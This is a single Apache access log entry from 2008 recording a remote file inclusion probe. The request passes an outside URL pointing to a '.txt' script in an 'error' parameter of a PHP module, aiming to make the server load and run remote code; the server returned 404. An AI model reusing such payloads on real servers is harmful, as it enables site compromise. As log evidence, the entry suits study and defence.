151.64.167.56 - - [24/Aug/2008:07:09:26 -0500] "GET /logs/access_log.1210118400//modules/cjaycontent/admin/editor2/errors.php?error=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 356 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
